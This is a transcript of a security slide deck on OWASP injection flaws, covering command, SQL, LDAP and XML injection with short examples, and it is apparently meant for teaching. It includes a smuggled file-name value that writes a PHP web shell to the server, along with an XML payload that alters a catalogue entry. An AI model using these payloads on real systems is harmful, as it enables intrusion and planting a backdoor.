OWASP A1 - Injection | The art of manipulation
-
Upload
pavan-m -
Category
Technology
-
view
119 -
download
4
Transcript of OWASP A1 - Injection | The art of manipulation
![Page 1: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/1.jpg)
OWASP
A1 – InjectionThe art of manipulation
pavanw3b
![Page 2: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/2.jpg)
$ whoami• Pavan aka pavanw3b• Security Engineer at• Null Hyd Core• Love hunting bugs• Got lucky with
• www.pavanw3b.com
![Page 3: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/3.jpg)
Injections – the worst ever!• Mar’08 – Heartland Payment System - 134m CC exposed • Oct’13 – $ 100,000 stolen from a California ISP• 2007 -2012: A group of hackers stole $300m from 10+
companies• 2014 – Shellshock: Remote Code Execution• 2015 – Microsoft RDP Remote Code Executionand many many other..
![Page 4: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/4.jpg)
Good vs Bad• Corporate Pentester
Give one week time and ask to find all the vulnerabilities.
• Attacker
Give sufficient time to find any one vulnerability to get in.
![Page 5: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/5.jpg)
When data become commands
Vayu, you are free to go!
Applicant Name :
Criminal Registration Form
Calling Vayu, you are free to go!
data =commands
![Page 6: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/6.jpg)
The dumb serverWhat file do you want to delete?
my_message.txt; echo ‘<?php system($_GET[“cmd”]); ?>’ > shell.php?file_name=
![Page 7: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/7.jpg)
Types of Injection1. Command Injection2. Database Injection
o SQLoNoSQL
3. LDAP4. XML Injection
![Page 8: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/8.jpg)
1. Remote Code Execution• User controlled data go into part of system commands.• Post Exploitation: Privilege Escalation.• Backdoor.
![Page 9: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/9.jpg)
2.1 SQL Injection• Perform (any) unauthorized database transaction.• Dump, drop, alter & many more.• Backdoor.
![Page 10: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/10.jpg)
2.2 NoSQL - No Injection?
![Page 11: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/11.jpg)
3. LDAP Injection
Try ( | & * and other special chars to see errors
![Page 12: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/12.jpg)
4. XML Injection• Attribute, Value, CDATA• XXE, XSLT, XPath
<catalog> <book id=“101”> <author>Pavan</author> <title>Dark w3b</title> <price>INR 200</price> </book></catalog>
102”><author>vayu</author><title>A treat</title><price>FREE</price></book><book id=“
<catalog> <book id=“102”> <author>vayu</author> <title>A treat</title> <price>FREE</price> </book> <book id=“101”> <author>Pavan</author> <title>Dark w3b</title> <price>INR 200</price> </book></catalog>
Payload
Result
![Page 13: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/13.jpg)
Some Credits• https://www.owasp.org• http://www.slideshare.net/m1ke/owasp-a1-injection• Rahul Sasi:
http://www.slideshare.net/_c0c0n_/webapp-remote-code-execution-via-scripting-engines
• Amol Naik: http://www.slideshare.net/AMolNAik3/xml-xpath-injections
• The Hacker News• CIO
![Page 14: OWASP A1 - Injection | The art of manipulation](https://reader036.fdocuments.in/reader036/viewer/2022062523/58ed5ffd1a28aba7708b45db/html5/thumbnails/14.jpg)
Questions?
Will be answeredin the humla session
Thanks/pavanw3b